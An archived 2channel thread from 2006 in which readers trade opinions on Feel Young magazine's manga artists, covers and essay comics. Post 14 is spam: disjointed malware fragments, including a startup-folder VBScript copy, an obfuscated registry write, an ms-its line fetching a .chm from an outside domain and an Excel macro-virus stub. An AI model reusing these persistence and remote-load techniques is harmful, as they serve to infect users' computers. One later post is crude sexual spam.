5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

フィールヤング ★ FEEL YOUNG ★26

1 :花と名無しさん:2006/12/12(火) 00:31:44 ID:???0
フィールヤングについて語りましょう。
毎月8日前後に発売。

前スレ
フィールヤング ★ FEEL YOUNG ★25
http://comic6.2ch.net/test/read.cgi/gcomic/1160124852/

過去スレ・公式は>>2、関連スレは>>3以降。

2 :花と名無しさん:2006/12/12(火) 00:32:24 ID:???0
過去スレ  その1
今!フィールヤング系作家を語る女達!!のスレ
http://comic.2ch.net/gcomic/kako/1005/10052/1005265969.html
今!フィールヤング系作家を語る女達!!のスレ 2
http://comic.2ch.net/gcomic/kako/1015/10158/1015852859.html
今!フィールヤング系作家を語る女達!!のスレ 3
http://comic.2ch.net/gcomic/kako/1029/10293/1029323327.html
★★★FEEL YOUNG 4 ★★★
http://comic.2ch.net/gcomic/kako/1034/10340/1034010881.html
今!フィールヤング系作家を語る女達!!5
http://comic.2ch.net/gcomic/kako/1040/10406/1040636189.html
今!フィールヤング系作家を語る女達!!6
http://comic.2ch.net/test/read.cgi/gcomic/1049903445/
★★★ フィールヤング 7 ★★★
http://comic.2ch.net/test/read.cgi/gcomic/1055820747/
★★★ フィールヤング 8 ★★★
http://comic.2ch.net/test/read.cgi/gcomic/1060316594/
★★★ フィールヤング 9 ★★★
http://comic.2ch.net/test/read.cgi/gcomic/1065328168/
★★★ フィールヤング 10 ★★★
http://comic.2ch.net/test/read.cgi/gcomic/1069218768/
フィールヤング ★ FEEL YOUNG ★11
http://comic.2ch.net/test/read.cgi/gcomic/1075453468/
フィールヤング ★ FEEL YOUNG ★12
http://comic4.2ch.net/test/read.cgi/gcomic/1079660072/
フィールヤング ★ FEEL YOUNG ★13
http://comic6.2ch.net/test/read.cgi/gcomic/1087331584/
フィールヤング ★ FEEL YOUNG ★ 14
http://comic6.2ch.net/test/read.cgi/gcomic/1092313972/
フィールヤング ★ FEEL YOUNG ★ 15
http://comic6.2ch.net/test/read.cgi/gcomic/1098497206/

3 :花と名無しさん:2006/12/12(火) 00:33:18 ID:???0
フィールヤング ★ FEEL YOUNG ★ 16
http://comic6.2ch.net/test/read.cgi/gcomic/1102785159/
フィールヤング ★ FEEL YOUNG ★ 17
http://comic6.2ch.net/test/read.cgi/gcomic/1108476815/
フィールヤング ★ FEEL YOUNG ★ 18
http://comic6.2ch.net/test/read.cgi/gcomic/1116216560/
フィールヤング ★ FEEL YOUNG ★ 19
http://comic6.2ch.net/test/read.cgi/gcomic/1122702849/
フィールヤング ★ FEEL YOUNG ★20
http://comic6.2ch.net/test/read.cgi/gcomic/1128759046/
フィールヤング ★ FEEL YOUNG ★22
http://comic6.2ch.net/test/read.cgi/gcomic/1144250414/
フィールヤング ★ FEEL YOUNG ★23
http://comic6.2ch.net/test/read.cgi/gcomic/1147976177/
フィールヤング ★ FEEL YOUNG ★24
http://comic6.2ch.net/test/read.cgi/gcomic/1152944137/
フィールヤング ★ FEEL YOUNG ★25
http://comic6.2ch.net/test/read.cgi/gcomic/1160124852/

4 :花と名無しさん:2006/12/12(火) 00:33:57 ID:???0
作家、関連スレ
安野モヨコ 17
http://comic6.2ch.net/test/read.cgi/gcomic/1159005931/
魚喃キリコ Part3
http://comic6.2ch.net/test/read.cgi/gcomic/1138407509/
連載いっぱい!!伊藤理佐 その4
http://comic6.2ch.net/test/read.cgi/gcomic/1146006977/
小野塚カホリと小野塚カマホリのスレッド
http://comic6.2ch.net/test/read.cgi/gcomic/1055702148/
【ピースオブケイク】ジョージ朝倉 第5ジャバ【溺れるナイフ】
http://comic6.2ch.net/test/read.cgi/gcomic/1141297217/
岡崎京子
http://comic6.2ch.net/test/read.cgi/rcomic/1140345090/
【サプリ】おかざき真里 part3
http://comic6.2ch.net/test/read.cgi/gcomic/1154776544/
かわかみじゅんこ2
http://comic6.2ch.net/test/read.cgi/gcomic/1122763603/
◆有間しのぶ・モンキー・パトロール8本目◆
http://comic6.2ch.net/test/read.cgi/gcomic/1150385394/
西村しのぶver.17
http://comic6.2ch.net/test/read.cgi/gcomic/1151831024/
南Q太を語るスレ。
http://comic6.2ch.net/test/read.cgi/gcomic/1121162500/
  高口里純 5  
http://comic6.2ch.net/test/read.cgi/gcomic/1137572777/
【今年は出すよ】楠本まき2【単行本】
http://comic6.2ch.net/test/read.cgi/gcomic/1143670981/
**三原ミツカズ2**
http://comic6.2ch.net/test/read.cgi/gcomic/1129253009/

5 :花と名無しさん:2006/12/12(火) 00:34:56 ID:???0
【画面】桜沢エリカ【真っ白】
http://comic6.2ch.net/test/read.cgi/gcomic/1143995877/ (dat落ち)
◎安積棍子◎さんは活動してるんですか? 2
http://comic6.2ch.net/test/read.cgi/gcomic/1130066229/
【今更チョイ悪オヤジ?】堀内三佳37コマ目【ただの黒ハゲ】
http://comic6.2ch.net/test/read.cgi/gcomic/1159511738/
【トレース】藤原薫 04【露骨杉】
http://comic6.2ch.net/test/read.cgi/gcomic/1129785699/
【やよい】イカリン☆しまいもん【ユーコ】
http://comic6.2ch.net/test/read.cgi/gcomic/1076302782/ (dat落ち)

次回作が待ち遠しいゾ
【Lunatic】月子【Ciild】
http://comic6.2ch.net/test/read.cgi/gcomic/1140422671/

6 :花と名無しさん:2006/12/12(火) 00:36:18 ID:???0
関連作家スレ追加です。

★宇仁田ゆみ★
http://comic6.2ch.net/test/read.cgi/gcomic/1058183435/

本気で50音続くかな
おおたうにってどうよ? 2
http://comic6.2ch.net/test/read.cgi/gcomic/1131446937/

7 :花と名無しさん:2006/12/12(火) 00:53:37 ID:???0
>>1 乙

凛が実はダイキチのじいさんの子ではないってオチのような気がしてたまらん。

8 :花と名無しさん:2006/12/12(火) 00:56:13 ID:???0
平仮名だった。

凛→りん

9 :花と名無しさん:2006/12/12(火) 01:11:58 ID:???0
コウキ母子と変則よにんぐらしかな

10 :花と名無しさん:2006/12/12(火) 01:13:13 ID:???O
>>1

11 :花と名無しさん:2006/12/12(火) 01:46:26 ID:ZEMVURzLO
>>1 ありがd

12 :花と名無しさん:2006/12/12(火) 01:59:01 ID:???O
>>1 お疲れさま

『あすか組』蘭塾に行ったけど、また 迷路でも攻略すんのかなぁ?


13 :花と名無しさん:2006/12/12(火) 04:56:14 ID:???0
あすかをしっかり読んでいる、
そして内容が把握できている人がいることに変な感動を覚えたw
一時暇潰しに読んでみたけどさっぱりわからん・・・
想像上だとしても、あんな厨房居ないだろ親と学校どんなだよということは理解したけどw

14 :<body onload=window()>:2006/12/12(火) 06:21:24 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

15 :花と名無しさん:2006/12/12(火) 06:27:48 ID:???0
>>14
( ^ω^)…死ねだお

16 :花と名無しさん:2006/12/12(火) 09:33:46 ID:???0
関連リンクは確認してからコピペして欲しかった・・・

17 :花と名無しさん:2006/12/12(火) 10:47:57 ID:???0
蘭塾内ならなんとかついていけるかなw

18 :花と名無しさん:2006/12/12(火) 11:52:10 ID:???0
今月ガハの話まだ出てないよね?

あの「ワラクシ」っていうのやめて欲しい。
何か寒い・・思うの私だけ?

19 :花と名無しさん:2006/12/12(火) 12:25:46 ID:???0
80年代ていすとだから

20 :花と名無しさん:2006/12/12(火) 13:56:02 ID:???0
>>19
なるほど。
あぁ、昔の感覚で今のおしゃれ語るから違和感あるのか!


21 :花と名無しさん:2006/12/12(火) 14:43:56 ID:???O
>>13
昔 『あすか組』人気あったんだよねぇ…

んで チラッと友達に借りて読んだ記憶があったから(´;ω;`)

さすがに 時代が違うんで今は読んでないけど…出てる人間が変化ないし

22 :花と名無しさん:2006/12/12(火) 17:01:11 ID:???0
>>21
昔、ドラマになったことは知ってるw
スケバン刑事あたりのドラマが流行ってた頃だよね。
古い漫画でも王家の紋章のような大河ドラマ的なものは
時代背景が別世界すぎて有りかなぁと思えるけど(読んでないけど
あすかは「ありえなさすぎ」でぽかーんとするしかないな。
過去のあすかを読んでいた人には面白いのかなぁ。
フィーヤンではなく週ジャンあたりならあすかでもイケるかもw


23 :花と名無しさん:2006/12/12(火) 17:54:02 ID:???0
旧あすかって、休刊した「ASUKA」に載ってたんだっけね。
移動してくる雑誌がそもそも間違いだったんじゃないの?

24 :花と名無しさん:2006/12/12(火) 18:31:57 ID:???0
あすか、今さらながらティアラの連中がスケボーに乗ってるのに気づいてワロタ。
スケボーに乗って攻撃って・・・今時どんなキャラだよw
確かに週ジャンならアリかも知れないけど。
話自体は例によってサッパリわかんねー。

25 :花と名無しさん:2006/12/12(火) 18:45:54 ID:???0
あすかは連載ではよくわからないよね。
昔と同じだ。
いじめられたら登校拒否や自殺を考えるような年齢の子が
読むといいんだけどね。

26 :花と名無しさん:2006/12/12(火) 18:55:46 ID:???O
昔のあすかは面白かったけどねえ
あすかよりロンタイBABYが好きだけど。
ピース、絵がダメだ。単行本集めてたけど嫌になってきた。

27 :花と名無しさん:2006/12/12(火) 19:05:58 ID:???0
>>23
休刊で移ったきたわけではなくて、リニューアル?で追い出されて
行き場が無くて作家自らフィルヤンwに持ち込んだ

28 :花と名無しさん:2006/12/12(火) 20:01:31 ID:???0
>>25
>いじめられたら登校拒否や自殺を考えるような年齢の子が
>読むといいんだけどね。

その年代がフィーヤンを読むのに違和感w
当時はあすか路線の話が当時の虐められっ子にうけたかもしれないけど
今の子にはナニソレ?スケ番て?氣志團的ヤンキー?で時代錯誤すぎだよ
作者の娘がゴスロリしてるらしいけど
それならば尚更お母さんの描くキャラのファッションセンスや間違いを
注意して訂正してあげたらどうかと思うけどな


29 :花と名無しさん:2006/12/12(火) 21:27:30 ID:???0
>>28
フィーヤン読者じゃなくてねw
週ジャンならいいかもというレスがあったから。


30 :花と名無しさん:2006/12/13(水) 00:44:22 ID:???0
今フジのチンパンジーが司会の番組に
コッコともっさんが映った(もっさんがなでられてキュキュと鳴かされてた)
八王子在住と出てたような

31 :花と名無しさん:2006/12/13(水) 02:53:21 ID:j25Ei6SKO
>>7に同意
正子さんがじいさんがつけた名前にこだわるのは、それもあると思う

32 :花と名無しさん:2006/12/13(水) 02:55:48 ID:???O
>>30
コッコ見たかった
ぶ〜けの頃から、きれいなイメージがある

33 :花と名無しさん:2006/12/13(水) 03:32:59 ID:???O
>>26
『ロンタイ』…確かにアッチの方が『あすか』より、まだ読めるかも

何か 最近のフィーヤンって面白くない…

34 :30:2006/12/13(水) 04:04:11 ID:???0
>>32
素人の投稿に混じって?眼鏡かけててホームビデオみたいなのだった。
もっさんメインだったから顔は正面じゃなくちょっと映っただけなので評価に自信ないけど、
漫画家の中ではかわいげのある顔だちに見えた。
少し年いったすっぴんの眼鏡っ子の、目がちょっと大きめで飾ってない感じ。w

もっさんは漫画の通りだったw いきなりアップで映ったとき「もっさんだ」とわかった程w

35 :花と名無しさん:2006/12/13(水) 06:54:11 ID:???0
前スレにもあったけど、
エリカの「ゲームは友達の家でやらせてもらいなさい」っての超引いた。


36 :花と名無しさん:2006/12/13(水) 08:09:45 ID:???O
今号のジョージの扉絵がなんかコワカタ…。
エリカって自分らマンセーな親バカ漫画しか載せてないのになんで表紙になるの?
うにたさんとか三原ミツカズとかの表紙が見たいな。

37 :花と名無しさん:2006/12/13(水) 08:33:11 ID:???0
>>35
どこでもゲームをしている子供が嫌いなら
外出時は子供にゲーム機を持たせなきゃいいだけなのに
何だかんだと偉そうなことを言って、それかよと。

38 :花と名無しさん:2006/12/13(水) 11:40:57 ID:???0
>>36
>うにたさんとか三原ミツカズとかの表紙が見たいな。

うにたさんとかの表紙が見たいな。
うにたさんとかの表紙が見たいな。
うにたさんとかの表紙が見たいな。
うにたさんとかの表紙が見たいな。
うにたさんとかの表紙が見たいな。
うにたさんとかの表紙が見たいな。
うにたさんとかの表紙が見たいな。

39 :花と名無しさん:2006/12/13(水) 11:49:35 ID:8vJ2QFqjO
うにたさんは絵が微妙なので無理です

エリカ帝は画力をカバーする知名度がモノいいます

40 :花と名無しさん:2006/12/13(水) 12:48:02 ID:???0
>>35
エリカ「自分は欲しいものはほぼ買ってもらってた」ってさらりと
書いてるのもなんだか…
自分がそうだったなら、もう少し「りゅっちには、ちょっとかわいそうだけど」感があってもいいような

41 :花と名無しさん:2006/12/13(水) 12:56:11 ID:???O
>>38は何が言いたいんだ?

42 :>>38じゃないけど通訳をば:2006/12/13(水) 13:01:46 ID:???O
>>41
「うにたの表紙が見たいだなんて、それはひょっとしてギャグで言ってるのか」

43 :花と名無しさん:2006/12/13(水) 14:03:48 ID:???O
ジョージの絵、なんか変わったよな と思うのは
髪の毛の書き方だよな。
もっとサラッと描いてくれりゃ〜綺麗なんだろうけど
なんかちとプルッてるっつ〜か…
変なお汁かぶって固まっちゃってるよ〜に見えてしまうのはアテクシだけかな?!

44 :花と名無しさん:2006/12/13(水) 15:37:43 ID:???O
殴り描き連載陣に比べりゃウニタの絵は全然マシ。


45 :花と名無しさん:2006/12/13(水) 16:04:49 ID:0Yrxr3U6O
>44
まあそうなんだけど、うにたの絵は
フィルヤンwの表紙向きではないと思う

46 :花と名無しさん:2006/12/13(水) 16:17:56 ID:???0
>>44
良い意味で漫画的で、表紙=イラスト向けじゃないんだよね。
その気になりゃ、それなりに表紙向きっぽい絵も描けるくらいの引き出しは
あるだろうけど。
まあ、わざわざチャレンジする必要は今のところないでしょ。

47 :花と名無しさん:2006/12/13(水) 16:23:48 ID:???0
ウニ太前にカバーイラストになった事あったよ


48 :花と名無しさん:2006/12/13(水) 17:24:18 ID:???0
>>43
かわかみじゅんこ風の髪の描き方だよね。
かわかみみたいに細くてキレイな線が旨みだと
あの髪の描き方すごくきれいだけどね。
ttp://www.ohzora.co.jp/sf/ease/images/author/07.jpg

ジョージのはただ、汚いだけ。最近、本当に絵が汚い。
体のデッサンおかしいし、絵が汚いのが気になって感情移入しにくい。

49 :花と名無しさん:2006/12/13(水) 17:36:00 ID:???0
>>41
そう思ってるのは君だけだ。
他の人はわかってるwww

50 :花と名無しさん:2006/12/13(水) 17:37:11 ID:???O
ジョージ、絵に勢いがある…のを通り越して、ザツしかも
パクリまがいなのがなんとも。
話も、シノの日常はホントにどーでもよくて、大きい展開が
つねにあかりがらみの、小説家デビューとか親の死とか、
いまどきりぼんかよってくらいお子ちゃまなエピソードに萎える。

51 :花と名無しさん:2006/12/13(水) 18:53:08 ID:???0
私は>>38は宇仁田とおおたうにを間違えてるのかと思ってた
宇仁田なら表紙になったことあっただりろ

52 :花と名無しさん:2006/12/13(水) 20:23:34 ID:???O
オバ厨ってやたらと「w」つけたがるよね。>>49

53 :花と名無しさん:2006/12/13(水) 22:48:52 ID:???0
>>52
リア厨のwwwには負ける

54 :花と名無しさん:2006/12/13(水) 22:49:58 ID:???0
ジョージはもう少し話の構成の勉強してほしい

55 :花と名無しさん:2006/12/14(木) 00:08:51 ID:???O
>>52
リア厨の「フィルヤン」には負ける

56 :花と名無しさん:2006/12/14(木) 00:50:07 ID:???0
エリカの、ゲームは他人の家でやらせてもらえって感覚から色んな
意識が見えた。邪魔なものは自分の家に入れたくないからって
困った問題は余所で解決しろと言わんばかりの身勝手さとか。
大体、余所様の迷惑は考えないし、一緒にゲームにハマる子供の
問題とかを考えていこうという、普通に親としての姿勢もないのか。
自分が何か特別な存在とか、貴族みたいに考えてないか?

57 :花と名無しさん:2006/12/14(木) 02:16:58 ID:???O
家族漫画はかわかみじゅんこだけでいい件。

58 :花と名無しさん:2006/12/14(木) 02:56:03 ID:???0
>>56
>>39

エリカ帝(笑)

59 :花と名無しさん:2006/12/14(木) 07:56:40 ID:???0
プレゼント当選者欄に知人の名前があった。
かなり前だけど前にも一度当たったことがあると
本人が言っていた(その時は自分も見て確認した)。
同じ人に当てたりするものなんだね。
まあその人アンケートとかマメにイラスト交えたりして書くほうだからかなぁ。
小説家の宮崎さんて人も二回くらい当たってたと思う。

60 :花と名無しさん:2006/12/14(木) 08:58:10 ID:???0
小説家の宮崎さんて誰?

61 :花と名無しさん:2006/12/14(木) 10:17:26 ID:???0
ちんちんの先っちょから
緑色がかった膿みがどろっと出たw



金玉袋のしわがものすごく臭いしw
ファブリーズしても大丈夫かな

62 :花と名無しさん:2006/12/14(木) 16:22:15 ID:ig+RKLsKO
ジョージの漫画ってリアルに貧乏くさいから好きじゃない

63 :花と名無しさん:2006/12/14(木) 16:56:23 ID:???0
>>62
そこが面白いのに
知らない世界が垣間見えて
リアドキュンってまわりにいないしワンダーランド
とても興味深く読んでる

64 :花と名無しさん:2006/12/14(木) 17:33:36 ID:???0
高円寺や下北沢に山程いそうな人達

65 :花と名無しさん:2006/12/14(木) 18:28:05 ID:???0
今回の表紙、なんかもっさくてオヴァ臭い。
一瞬、どこの新人が描いたのかと思った。

66 :花と名無しさん:2006/12/14(木) 18:48:45 ID:???0
エリカ帝への悪口は罰せられるぞ!

67 :花と名無しさん:2006/12/14(木) 18:56:57 ID:???0
>>66
わぁーごめんなさい☆
でも、本当のことだからつい言ってしまったのw

68 :花と名無しさん:2006/12/14(木) 19:18:58 ID:???O
>>59 それは私の事でしょうか?
二回当たった事が。
全国1名様が当たった時は、宝くじ買ってりゃ良かったと
心底悔しかったです。

69 :花と名無しさん:2006/12/14(木) 19:48:04 ID:???O
>>65
私もオモタ!タイトルつけるとしたら「38歳マダム、こじゃれたパーティーへ」かな。
エリカの趣味のページと間違えてるんじゃないのか?
あんなだからリア厨にフィルヤンwの年齢層高いとかって言われるんだよ。

70 :花と名無しさん:2006/12/14(木) 21:18:06 ID:???0
趣味ってゆーか自分の性癖もあるんじゃないかな
結婚するちょっと前あたりからか、
同年代嫌いで年上好きのマダムキラー青年(笑)と
そのマダムキラーに目をつけられるセレブなマダム(笑)
ってマンガをやたら描くようになったもんなあ、エリカ帝

71 :花と名無しさん:2006/12/14(木) 21:29:19 ID:???0
>>69
「38歳オヴァ、エセレブを気取って」で良いって。
表紙がアレだと購買意欲が下がると思う。

72 :花と名無しさん:2006/12/14(木) 21:47:18 ID:???0
井上三太のブサイクキャラが女装した感じだよな、今回の表紙

73 :花と名無しさん:2006/12/14(木) 21:53:46 ID:???0
あれオカマじゃなかったんだ

74 :花と名無しさん:2006/12/14(木) 21:58:13 ID:???0
そういえばエリカ帝はオカマも大好きだったな

75 :花と名無しさん:2006/12/15(金) 01:43:15 ID:???0
小説家の宮崎さんて宮崎誉子さんかな?
一度なら見たよ

アシスタントの人の名前見つけることもあるよ<プレゼント当選者

76 :花と名無しさん:2006/12/15(金) 09:52:13 ID:???O
>>70
そいじゃ「38歳勘違いオヴァ、リッチなレストランでヒモにご馳走よ(ハァト」は?

エリカって「ナチュラルな生活してるわよ〜」をアピールしつつ「でもワタクシはセレブ!」を随所で強調するから嫌われる。
自慢して叩かれたくはないが、見下されたくもないって感じ。
つか美人でもないのに著書の表紙にモデル気取りで…サムッ。

77 :花と名無しさん:2006/12/15(金) 10:46:27 ID:???0
子育て漫画って、子供が小学校以上になると家の教育方針のことが前に出てくるから
むつかしいよね。
特にエリカの家はハリボテのセレブだから、あらが出やすい。
ネタとして載せてるのかな?なんで再開したんだろう。叩くとかじゃなく、素直に疑問。


78 :花と名無しさん:2006/12/15(金) 10:48:13 ID:???0
>>76
あれキモイよねぇ。しかも早く単行本にしたくってFCwebに
原稿ボンボン載せて単行本化・・・。金に困ってんの?って感じだ。

79 :花と名無しさん:2006/12/15(金) 12:47:18 ID:???O
子供にゲーム買ってあげないのも「セレブの子供はゲームなんかしないんザーマス!」って、自分のイメージ保持のためっぽい。

80 :花と名無しさん:2006/12/15(金) 16:46:17 ID:???0
エリカ帝のとこは旦那さんが異常にまめに子供の面倒見るからね。
もし旦那が病気で入院しちゃう事とかになったら
即買い与えそう>ゲーム機

81 :花と名無しさん:2006/12/15(金) 17:16:13 ID:???0
セレブっつうより細腕繁盛記って感じだが。
3人養ってんでしょ

82 :花と名無しさん:2006/12/16(土) 01:21:07 ID:???0
あと猫と亀と自分のお母さんも

83 :花と名無しさん:2006/12/16(土) 04:06:50 ID:???0
家の教育方針って言ったらミカリンのところは
英語教育に凄い力入ってるよね。

84 :花と名無しさん:2006/12/16(土) 07:08:20 ID:???O
でも先月号で、痛くて倒れそうなのに試験受けさせたのはびっくり。まだ子供だよ!?たかが英検だし。
まぁミカリンスレ見ればわかるよ。

85 :花と名無しさん:2006/12/16(土) 14:09:56 ID:???0
>>82
亀は母親んとこに預けたんじゃなかった?
かわいいとか言っといて結局捨てるんだよね


86 :花と名無しさん:2006/12/16(土) 15:19:13 ID:???O
細腕繁盛記…ブランドものにはまらなかったり、お受験しようなんて思わなかったり
バリバリ日本人なのにインターナショナルスクールにいれようとして周りに止められなかったり、
ホメオパシー信者で、誤飲で苦しむ子供を病院につれていこうとしなかったり
しなければなー。

87 :花と名無しさん:2006/12/16(土) 17:46:42 ID:???0
>>85
そうだったんだ。お母さんも一緒に住んでると思ってた。すまん

88 :花と名無しさん:2006/12/16(土) 21:17:58 ID:???0
エリカ帝はエリカスタイル以外でもいちいちカメラマン使って写真とってるもんな

>>84
たしか準2級だよね

89 :花と名無しさん:2006/12/17(日) 15:30:53 ID:???O
エリカスタイルと言えば…
バブル全盛期=エリカ絶頂期の頃ならともかく、今のフィーヤンにエリカのおブランド自慢やエリカが個人的に気に入ってるコスメ漫画載せて喜ぶ人いるの?
せめてエリカがモデル並みの容姿だったらね。気取ってても所詮ナルおばさん漫画家だし、特に憧れる要素がない。


90 :花と名無しさん:2006/12/17(日) 16:27:21 ID:???0
>>89
私も不思議でしょうがないんだが、西村のエッセイも続いてるし
彼女の時代錯誤な年増にしかみえない大学生の漫画が未だに掲載されたりするってことは
エリカや西村をおしゃれだと憧れている読者がけっこう多いんだろうねw

91 :花と名無しさん:2006/12/18(月) 08:26:17 ID:???O
自分たちを何かのカリスマとでも思ってるのかな。
だったら漫画家として大作描けよって思う。ラブリーだのRUSHだの、昔の連載を思い出したように時々載せられてもワケわからない…。

92 :花と名無しさん:2006/12/18(月) 10:13:20 ID:???0
そういえば、その2人の対談載ってたよね。
表面ではおだやかっぽかったけど、実は見栄の張り合いで
仲良さそうには見えなかった。

対談後のコメント
帝→ガハ 「そりゃ美人ですよ」
ガハ→帝 「貯金ー?ないよー」

93 :花と名無しさん:2006/12/18(月) 11:46:45 ID:???0
エリカ帝は対談するのほんとに好きだよね。よしながふみなんかも結構したがるけど
よしながはエリカ帝や画伯よりはちゃんとマンガ描いてるし

94 :花と名無しさん:2006/12/18(月) 12:01:27 ID:???0
対談で思い出したけど、昔オカマ口調のエッセイ載ってなかったっけ。

その人がハピマニ全盛時代のモヨと対談して
「先生は、作家本人よりも作品が前に出ることが信条の方なので・・」
と載っていた。。



95 :花と名無しさん:2006/12/18(月) 12:36:48 ID:???O
モヨ夫妻のエッセイ漫画はすごく面白かった。
エリカ&しのぶが不評なのは、自己マンセー満載、オサレなアタシの暮らし振りを見て!!憧れて!!をアピってるから。

こいつらのオナヌエッセイ要らないから、モヨ&監督クン復活きぼんぬ。

96 :花と名無しさん:2006/12/18(月) 15:04:43 ID:???O
西村の自己満エッセイ、本当に嫌い。
時代錯誤甚だしいオバサンの自慢話なんて全然興味ない。
自分のHP内だけで信者向けに描いてくれ。

97 :花と名無しさん:2006/12/18(月) 15:42:00 ID:???0
RUSHってすごい昔の漫画なんだね、古本屋で知った。
どうりでかみ合わないと思った。
イマドキ女子大生がヨウジ着るか?カマロ乗ってる医者っつうのもなぁ。。

98 :花と名無しさん:2006/12/18(月) 16:26:54 ID:???0
監督くんは戻ってこなくていい。


99 :花と名無しさん:2006/12/18(月) 16:57:50 ID:???0
>>96
だな。ブログで掲載→信者向けに少部数書籍化、でいいとオモ。


100 :花と名無しさん:2006/12/18(月) 21:32:50 ID:???0
西村のファンって必要以上にオタっぽいオバサン多いのが不思議でしょうがない

101 :花と名無しさん:2006/12/18(月) 22:11:56 ID:???0
だって西村がそうだもん
ニュータイプ(ヲタ向け誌)でエッセイ描いてたし

102 :花と名無しさん:2006/12/18(月) 23:36:45 ID:???0
「オタなのにオサレな意外性のカタマリのアテクシ」っていう
自己像が透けて見えるのがいやなんだよ〜。

103 :花と名無しさん:2006/12/19(火) 02:58:16 ID:???O
ブランド物しか着れないおばちゃんってオサレ?
ビルケン履いてた知り合いこきおろしてたし。

104 :花と名無しさん:2006/12/19(火) 04:31:14 ID:???0
1年落ちくらいがこなれてておしゃれ みたいな
自意識過剰な「さりげなさ」

105 :花と名無しさん:2006/12/19(火) 05:56:14 ID:???O
期待を裏切って申し訳ないけど、ガハの漫画って売れてるんだよね。
へたすると、フィーヤン一押しのジョージの倍。
エリカは、昔からの読者のために記号として存続してるんだと思う。

106 :花と名無しさん:2006/12/19(火) 08:17:12 ID:???O
別に売れてたっていいよ。売れてないなんて誰か言ったか?バブル期に女子大生〜OLだったオヴァにはウケるんジャマイカ。

その時の感覚が現在のフィーヤンにも通用すると思ってるのが痛いってみんな言ってるわけ。

107 :花と名無しさん:2006/12/19(火) 08:54:01 ID:???0
>>106
実に禿。



108 :花と名無しさん:2006/12/19(火) 09:44:54 ID:???0
>>106
胴衣。売れっ子だろうが、何だろうがあの感覚は気持ち悪い。


109 :花と名無しさん:2006/12/19(火) 09:54:01 ID:???0
「なんで載ってるのか?」「何で続いてるのか?」って言っといて
理由が「売れてるから」っていうのは納得いかないのか・・・。
しょうがないよ、雑誌だもん。嫌な人はお気に入りの作家だけ単行本で買えばいい。

110 :花と名無しさん:2006/12/19(火) 10:52:03 ID:???0
>>106
わたし、バブル期に女子大生〜OLだったオヴァだけど、
西村しのぶなんて読んでて赤面ものだよ。
バブル育ちのオヴァでも普通に生きてたら今の時代の感覚
ちゃんと身に付いてるって〜
ひとくくりにしちゃイヤン。

111 :花と名無しさん:2006/12/19(火) 12:33:13 ID:???0
>>110
うん、西村は特殊だよね
柔軟性がなくて視野が狭いんだろう

112 :花と名無しさん:2006/12/19(火) 12:34:21 ID:???O
>>109
だからさぁ、売れてるってのは儲に単行本が売れてるのであって、漫画家として現役の売れっ子という意味じゃないでしょ。

フィーヤン読者にしてみればむしろ>>109の逆意見。西村やらエリカやら、フィーヤンにはいらないから読みたい人がコミックス買って読めばいい。

113 :花と名無しさん:2006/12/19(火) 13:31:57 ID:???0
>>112
どういー。西村とかエリカの単行本は売れるのは理解できるけど、
雑誌に載ってたって昔ほどの需要はないと思う。人気ないもん。

114 :花と名無しさん:2006/12/19(火) 14:05:00 ID:???0
エリカも西村も編集との馴れ合いで仕事あるのかなあ。
ミカリンとかあの辺ほんといらない。つまらんエッセイ載せるよりもストーリー漫画増やしてくれ。

115 :花と名無しさん:2006/12/19(火) 16:51:28 ID:???0
なんでこんなに客観性のない奴等がエッセイ漫画とか描くんだろ。
自分の主観こそが価値がある=エッセイ漫画はそこだけ描いてりゃ
いい、みたいな幼稚なスタンスで。
エッセイでパリパリが読みやすい理由がわかった。そんなオヴァ
作家流の、主観だけで「ここが不便よ、ムキィー」ってんじゃなく
適当に、世の中こういうもんです、みたいな表現があるからだ。

116 :花と名無しさん:2006/12/19(火) 18:06:58 ID:???0
ところでフィリップさんのルックスが段々日本人化してきてないか?


117 :花と名無しさん:2006/12/20(水) 08:21:00 ID:???O
パリパリのさらりとした感じが好き。
異国での出産や育児は大変だろうに、そうゆう部分をアピってないし。
エリカやすごろくみたいに「うちの子供マンセー」してないし。
でも赤子の可愛さがちゃんと伝わってくる。

118 :花と名無しさん:2006/12/20(水) 13:27:42 ID:???0
育児漫画とか、ああいう作家の身の回りの人の話って、
描く側の客観的な視点+漫画特有の嘘と誇張ががうまく混ざると
作品として面白くなるとおもう。
安彦の再婚漫画とか、面白かったけど、全部が全部ホントの話じゃない
んだろうなって感じする。
モヨコ夫婦の漫画も、単行本の後書きに書いてあるけどあれもかなり
誇張入ってるし。

日常を単純に強調するだけだとすごろくみたいにイタくなるし、
そのまま書くとエリカやQ太みたいに話が平坦すぎてつまんないんだよね。

119 :花と名無しさん:2006/12/20(水) 16:51:49 ID:???0
その最悪たる例がゲコの家物語なわけだが。

120 :花と名無しさん:2006/12/20(水) 17:41:27 ID:???0
今さらながらFCwebのワイルドハンズ見た。
紐はgの漫画見る限りイケメンかと思いきやただのオッサンなんだね

121 :花と名無しさん:2006/12/20(水) 17:45:34 ID:???0
パリパリは自分の子供のこと赤子って呼んでるのがいい。

122 :花と名無しさん:2006/12/20(水) 18:26:58 ID:???0
>>120
それでもそこの紐写真は映りが良いって言われてたおwwwww

